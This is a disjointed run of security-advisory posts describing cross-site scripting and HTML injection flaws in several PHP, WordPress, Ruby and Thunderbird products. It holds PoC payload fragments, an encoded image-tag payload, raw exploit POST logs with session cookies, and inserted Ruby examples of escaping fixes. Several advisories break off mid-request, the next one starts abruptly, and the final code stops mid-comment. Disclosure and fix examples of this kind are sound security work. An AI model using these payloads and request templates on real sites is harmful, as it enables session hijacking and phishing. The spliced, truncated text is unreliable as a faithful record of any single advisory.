Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Products (Add)

Vulnerable Input(s):
[+] Product Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Products List

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with a privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload (the injected tags were lost in extraction; residue kept as found)
test">
test">

--- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvVnhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test">&sku=&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb2todjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly

--- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept:
[FD] PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300

Release Date:
=============
2021-10-28

Vulnerability Laboratory ID (VL-ID):
====================================
2300

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the Developer License and customize the script to fit your specific needs.

(Copy of the Homepage: https://www.phpjabbers.com/simple-cms/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web application.

Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHPJabbers Simple CMS v5.0 web application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) POST requests. Privileged authenticated accounts with UI access are able to inject malicious script code as the name of a user. The script code is executed, after the POST injection, in the user list (pjAdminUsers).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create (Add)
[+] Update

Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate

Affected Module(s):
[+] pjAdminUsers

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged user accounts and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Payloads (the injected tags were lost in extraction; residue kept as found)
">
">

--- PoC Session Logs (POST) [Add & Update] ---
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin: https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r">&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost
[FD] Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
Document Title:
===
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2277

Release Date:
===
2021-10-28

Vulnerability Laboratory ID (VL-ID):
===
2277

Common Vulnerability Scoring System:
===
5.3

Vulnerability Class:
===
Cross Site Scripting - Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Hotel, Motel, Bar & Restaurant Listing Plugin + Membership plugin for WordPress, built with PHP and MySQL technology.

(Copy of the Homepage: https://hotel.eplug-ins.com/hoteldoc/ )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the official Hotel Listing v3.x WordPress plugin web-application.

Affected Product(s):
===
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)

Vulnerability Disclosure Timeline:
===
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (Guest Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
Multiple persistent input validation web vulnerabilities have been discovered in the official Hotel Listing v3.x WordPress plugin web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The vulnerabilities are located in the address, city, zipcode, country and location input fields of the add-new-listing form in the my-account module. Remote attackers can register a low-privileged application user account and inject malicious script code with a persistent attack vector to hijack user or admin session credentials, or to permanently manipulate the affected modules. The injected script code executes in the frontend on preview, and also in the backend when an administrative account edits or lists the entry (?&profile=all-post). The request method to inject is POST and the attack vector is persistent, located on the application side.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add New Listing

Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country

Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit

Proof of Concept (PoC):
===
The persistent web vulnerabilities can be exploited by remote attackers with a privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E

Vulnerable Source: new-listing
Address >"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter address Here">
Area >"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Area Here">
City >"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter city ">
Zipcode >"" placeholder="Enter Zipcode ">
State >"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter State ">
Country >"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Country ">

--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin: http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer: ht
[FD] My Movie Collection Sinatra App - (Movie) XSS Vulnerability
Document Title:
===
My Movie Collection Sinatra App - (Movie) XSS Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2294

Release Date:
===
2021-11-01

Vulnerability Laboratory ID (VL-ID):
===
2294

Common Vulnerability Scoring System:
===
5.6

Vulnerability Class:
===
Cross Site Scripting - Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Welcome to My Movie Collection Sinatra web app where you can create, read, update, and delete movies that you own. Here you can build and keep track of your DVD/Blu-Ray collection. You can also add movie comments and date purchased. The code is available as open source under the terms of the MIT License.

(Copy of the Homepage: https://github.com/jffernan/my-movie-collection )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the My Movie Collection Sinatra web-application.

Affected Product(s):
===
James Fernandez
Product: My Movie Collection Sinatra app (v2017 & v2018) - Video Application (Web-Application) (Ruby)

Vulnerability Disclosure Timeline:
===
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (User Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
A persistent cross site scripting web vulnerability has been discovered in the official My Movie Collection Sinatra v2018 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The persistent cross site scripting web vulnerability is located in the `title` and `comment` parameters of the `movies/new` module. Authenticated remote attackers with user privileges are able to send manipulated POST method requests when creating a movie to inject malicious script code with a persistent attack vector. The request method to inject is POST and the attack vector is located on the application side. The payload also executes on the preview of all movies, for every user who views it. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to a malicious source and persistent manipulation of the affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] movies/new

Vulnerable Input(s):
[+] Create New Movie Below:
[+] Description (Comment)

Vulnerable Parameter(s):
[+] title
[+] comment

Affected Module(s):
[+] movies

Proof of Concept (PoC):
===
The persistent cross site scripting web vulnerability can be exploited by remote attackers with a user account and low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
">

https://sinatra-my-movie-collection.localhost:8000/movies
Host: sinatra-my-movie-collection.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---210716863231834847754001617875
Content-Length: 580
Origin: https://sinatra-my-movie-collection.localhost:8000
Connection: keep-alive
Referer: https://sinatra-my-movie-collection.localhost:8000/movies/new
Cookie: rack.session=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiRWExYmI3MzNjMjY0MzI0OWFmZjhm%0ANTBkZDJmY2U1Y2VmMTljMjM0ODljYWY2NTVmNGZjNmQ5OWM3YWE5OTNiMzcG%0AOwBGSSIJY3NyZgY7AEZJIjFBYld4dnVKVVpxS1Bzd2hsNzVqZmNPZHg5MURR%0ATzBvRnEwdnJOZklSaVVFPQY7AEZJIg10cmFja2luZwY7AEZ7B0kiFEhUVFBf%0AVVNFUl9BR0VOVAY7AFRJIi1jYjExMDUyYzliMTQyYzkyMmMwOTQzMDAwNmQ5%0AMTk1ODk5ZTVhNGYwBjsARkkiGUhUVFBfQUNDRVBUX0xBTkdVQUdFBjsAVEki%0ALWRkMDY1ZWQyNjNjNjdkNzk5Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUGOwBG%0ASSIMdXNlcl9pZAY7AEZpGw%3D%3D%0A--cbce7ee175a442b3be02b5a755e1b5809c788194
Post: title=test1">
-
https://sinatra-my-movie-collection.localhost:8000/movies/14
Content-Length: 0
Server: WEBrick/1.3.1 (Ruby/2.3.3/2016-11-21)
[FD] My Movie Collection Sinatra App - (Login) XSS Vulnerabilities
Document Title:
===
My Movie Collection Sinatra App - (Login) XSS Vulnerabilities

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2293

Release Date:
===
2021-11-01

Vulnerability Laboratory ID (VL-ID):
===
2293

Common Vulnerability Scoring System:
===
5.1

Vulnerability Class:
===
Cross Site Scripting - Non Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Welcome to My Movie Collection Sinatra web app where you can create, read, update, and delete movies that you own. Here you can build and keep track of your DVD/Blu-Ray collection. You can also add movie comments and date purchased. The code is available as open source under the terms of the MIT License.

(Copy of the Homepage: https://github.com/jffernan/my-movie-collection )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the My Movie Collection Sinatra web-application.

Affected Product(s):
===
James Fernandez
Product: My Movie Collection Sinatra app (v2017 & v2018) - Video Application (Web-Application) (Ruby)

Vulnerability Disclosure Timeline:
===
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Pre Auth (No Privileges or Session)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official My Movie Collection Sinatra web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector, compromising browser-to-web-application requests on the client side.

The non-persistent cross site scripting web vulnerabilities are located in the username and password input fields of the login and signup modules. Unauthenticated remote attackers are able to send manipulated POST method requests for login or signup to inject malicious script code with a non-persistent attack vector. The request method to inject is POST and the attack vector is located on the client side. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to a malicious source and non-persistent manipulation of the affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./login
[+] ./signup

Vulnerable Input(s):
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] username
[+] password

Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
">

https://sinatra-my-movie-collection.localhost:8000/login
Host: sinatra-my-movie-collection.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Origin: https://sinatra-my-movie-collection.localhost:8000
Connection: keep-alive
Referer: https://sinatra-my-movie-collection.localhost:8000/login
Cookie: rack.session=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiRWExYmI3MzNjMjY0MzI0OWFmZjhm%0ANTBkZDJmY2U1Y2VmMTljMjM0ODljYWY2NTVmNGZjNmQ5OWM3YWE5OTNiMzcG%0AOwBGSSIJY3NyZgY7AEZJIjFzWWZUWmJzK2F2VjZYVUVweHBhdDh1LzROUUdQ%0AaXozNmsyWkhabzJYRDhJPQY7AEZJIg10cmFja2luZwY7AEZ7B0kiFEhUVFBf%0AVVNFUl9BR0VOVAY7AFRJIi1jYjExMDUyYzliMTQyYzkyMmMwOTQzMDAwNmQ5%0AMTk1ODk5ZTVhNGYwBjsARkkiGUhUVFBfQUNDRVBUX0xBTkdVQUdFBjsAVEki%0ALWRkMDY1ZWQyNjNjNjdkNzk5Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUGOwBG%0A--0b309977af0b38c2447b5de4853c1057e744939c
username=">
-
https://sinatra-my-movie-collection.localhost:8000/
Content-Length: 0
Server: WEBrick/1.3.1 (Ruby/2.3.3/2016-11-21)
-
https://sinatra-my-movie-collection.localhost:8000/evil.source
Host: sinatra-my-movie-collection.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://sinatra-my-movie-collection.localhost:8000/signup
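The stored and reflected cases above (the user `name` in the PHPJabbers pjAdminUsers list, the listing fields in Hotel Listing, and the `title`, `comment`, `username` and `password` fields of the Sinatra app) share one root cause: the submitted value is written into an HTML attribute or element without encoding, so a leading `">` closes the attribute and whatever follows becomes markup. The Ruby below is an added illustration, not code from any of the projects named on this page. It uses only the standard library (ERB and CGI) so it runs without Sinatra, the attacker-supplied value is a constructed sample, and the template layout is the example's own. It renders the same value through an unescaped and an escaped template and includes the check a regression test can run against either.

```ruby
require "erb"
require "cgi"

# Constructed sample input: a value an attacker could submit as a movie
# title, a CMS user name or a login username. The element is a harmless
# marker; the check below looks for it verbatim in the rendered output.
ATTACK_VALUE = %q{test1"><img src="evil.source">}

# Vulnerable pattern: the value is interpolated into an attribute and into
# element text with no encoding. The leading "> closes the attribute and
# the injected element becomes part of the page.
VULNERABLE_TEMPLATE = <<~HTML
  <input name="title" value="<%= title %>">
  <h2><%= title %></h2>
HTML

# Hardened pattern: every interpolation goes through h(), which encodes
# & < > " and ' so the value can only ever be text. In a Sinatra app the
# equivalent helper is Rack::Utils.escape_html.
SAFE_TEMPLATE = <<~HTML
  <input name="title" value="<%= h(title) %>">
  <h2><%= h(title) %></h2>
HTML

# Minimal view object: exposes the untrusted value and the escaping helper
# to the template's binding.
class View
  attr_reader :title

  def initialize(title)
    @title = title
  end

  def h(value)
    CGI.escapeHTML(value.to_s)
  end

  def render(template)
    ERB.new(template).result(binding)
  end
end

def render_vulnerable(title)
  View.new(title).render(VULNERABLE_TEMPLATE)
end

def render_safe(title)
  View.new(title).render(SAFE_TEMPLATE)
end

# Regression check: true if the marker element survived rendering as
# markup, i.e. the value was reflected or stored without encoding. Whether
# the value came from the request (reflected) or the database (stored)
# makes no difference to the check or to the fix.
def reflects_unescaped?(html, marker = '<img src="evil.source">')
  html.include?(marker)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable rendering:\n#{render_vulnerable(ATTACK_VALUE)}"
  puts "safe rendering:\n#{render_safe(ATTACK_VALUE)}"
end
```

The escaped output keeps the attacker's text intact (`test1&quot;&gt;&lt;img ...`), which is the point: encoding at output time fixes the bug without rejecting or mangling legitimate titles that happen to contain quotes.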
[FD] Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities
Document Title:
===
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2280

Release Date:
===
2021-11-05

Vulnerability Laboratory ID (VL-ID):
===
2280

Common Vulnerability Scoring System:
===
5.2

Vulnerability Class:
===
Cross Site Scripting - Non Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Quick and easy payment terminal as script for clients to pay for products and services.

(Copy of the Homepage: https://www.criticalgears.com/product/authorize-net-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/paypal-pro-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/stripe-payment-terminal/ )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.

Affected Product(s):
===
CriticalGears
Product: Authorize.net Payment Terminal 2.4.1 - Payment Form Script (PHP) (Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Form Script (PHP) (Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Form Script (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
===
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Pre Auth (No Privileges or Session)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Authorize.net Payment Terminal v2.4.1, the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector, compromising client-side browser-to-web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the `item_description`, `fname`, `lname`, `address`, `city` and `email` parameters of the `Billing Information` and `Payment Information` forms. Attackers are able to inject malicious script code into the `Description`, `Firstname`, `Lastname`, `Address`, `City` and `Email` input fields to manipulate client-side requests. The request method to inject is POST and the attack vector is non-persistent, on the client side. Where the form is embedded in another web service, attackers can exploit the bug by triggering execution of the script code in the invalid-input exception handling. The PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1 ship the same vulnerable script and are affected by the same validation vulnerability. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to a malicious source and non-persistent manipulation of the affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Billing Information
[+] Payment Information

Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email

Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email

Affected Module(s):
[+] Exception Handling (Invalid)

Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
">%20%20
">%20%20

Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)
Payment Information
Description: %20 onkeyup="checkFieldBack(this);"
Amount:
[FD] ImportExportTools NG 10.0.4 - HTML Injection Vulnerability
Document Title:
===
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2308

Release Date:
===
2021-11-05

Vulnerability Laboratory ID (VL-ID):
===
2308

Common Vulnerability Scoring System:
===
4.2

Vulnerability Class:
===
Script Code Injection

Current Estimated Price:
===
1.000€ - 2.000€

Product & Service Introduction:
===
Adds tools to import/export messages and folders (NextGen).

(Copy of the Homepage: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird.

Affected Product(s):
===
Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)

Vulnerability Disclosure Timeline:
===
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Pre Auth (No Privileges or Session)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
An HTML injection vulnerability has been discovered in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird. The vulnerability allows a remote attacker to inject HTML payloads to compromise application data or session credentials.

The vulnerability is located in the HTML export function. Unlike Thunderbird's own export, the add-on does not sanitize the message subject when exporting. A remote attacker can therefore send an email whose subject carries a malformed HTML payload; the payload executes when the victim user previews the file produced by an HTML export.

Vulnerable Module(s):
[+] Export (HTML)

Proof of Concept (PoC):
===
The web vulnerability can be exploited by remote attackers without a user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install Mozilla Thunderbird
2. Install ImportExportTools NG v10.0.4
3. Use another email account to write to the target inbox where the export takes place
   Note: Inject any HTML test payload into the subject
4. The target user exports the content of the inbox as HTML, where the payload executes
5. Successful reproduction of the encoding validation vulnerability!

Note: Some years ago we reported the same issue in the HTML export of KeePass and of Kaspersky Password Manager; both were successfully resolved.

Vulnerable Source: ImportExportTools Exported HTML File
table { border-collapse: collapse; }
th { background-color: #e6; }
th, td { padding: 4px; text-align: left; vertical-align: center; }
tr:nth-child(even) { background-color: #f0f0f0; }
tr:nth-child(odd) { background-color: #fff; }
tr>:nth-child(5) { text-align: center; }

Posteingang (Inbox)
Posteingang (10/07/2021)
Betreff (Subject) | Von (From) | An (To) | Datum (Date) | Anhang (Attachment)
payload in subject "> | t...@vulnerability-lab.com
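The export function above writes the Subject header into an HTML table, and the fix is the same output encoding the web cases on this page need. One caveat specific to mail exporters, added here as an illustration and not taken from the advisory or from the add-on's code: a Subject header may arrive RFC 2047 encoded (`=?UTF-8?B?...?=`), and in that form it contains no `<` or `>` at all. Escaping has to be applied to the decoded string that is actually written into the file, not to the stored header. The Ruby below is an added example with a deliberately small encoded-word decoder (a real exporter would use its MIME library), constructed sample messages, and a table that only mirrors the column headings visible in the dump above; the real column layout of the add-on's export is not known from the advisory.

```ruby
require "base64"
require "cgi"

# RFC 2047 encoded-word: =?charset?B?base64?= or =?charset?Q?quoted?=
ENCODED_WORD = /=\?([^?]+)\?([BbQq])\?([^?]*)\?=/

# Decodes B (base64) and Q (quoted-printable style) encoded words in a
# header value and returns a UTF-8 string. Small on purpose: no folding,
# no adjacent-word whitespace rules, unknown charsets fall back to UTF-8.
def decode_encoded_words(header)
  header.gsub(ENCODED_WORD) do
    charset = Regexp.last_match(1)
    encoding = Regexp.last_match(2).upcase
    text = Regexp.last_match(3)
    bytes =
      if encoding == "B"
        Base64.decode64(text)
      else
        # Q encoding: "_" is a space, "=XX" is a raw byte. Work on a binary
        # copy so the byte values do not collide with the source encoding.
        text.b.tr("_", " ").gsub(/=([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
      end
    enc = (Encoding.find(charset) rescue Encoding::UTF_8)
    bytes.force_encoding(enc).encode("UTF-8", invalid: :replace, undef: :replace).scrub
  end
end

# Constructed samples: the same marker element arriving three ways. The
# second subject is what a mail client produces for a non-ASCII subject,
# and it holds no < or > until it is decoded. The third is a harmless
# non-ASCII subject that must survive intact.
RAW_PAYLOAD = %q{"><img src="evil.source">}
SAMPLE_MESSAGES = [
  { subject: RAW_PAYLOAD, from: "attacker@example.invalid", to: "t...@vulnerability-lab.com", date: "10/07/2021" },
  { subject: "=?UTF-8?B?#{Base64.strict_encode64(RAW_PAYLOAD)}?=", from: "attacker@example.invalid", to: "t...@vulnerability-lab.com", date: "10/07/2021" },
  { subject: "=?UTF-8?Q?Gr=C3=BC=C3=9Fe?=", from: "kollege@example.invalid", to: "t...@vulnerability-lab.com", date: "10/07/2021" }
]

# Wrong order of operations: the header is escaped as stored and decoded
# afterwards. The encoded form passes the escape untouched and the decoder
# then reveals live markup in the file.
def export_row_vulnerable(msg)
  subject = decode_encoded_words(CGI.escapeHTML(msg[:subject]))
  cells = [subject, msg[:from], msg[:to], msg[:date]]
  "<tr>" + cells.map { |c| "<td>#{c}</td>" }.join + "</tr>"
end

# Correct order: decode first, then escape exactly the string that is
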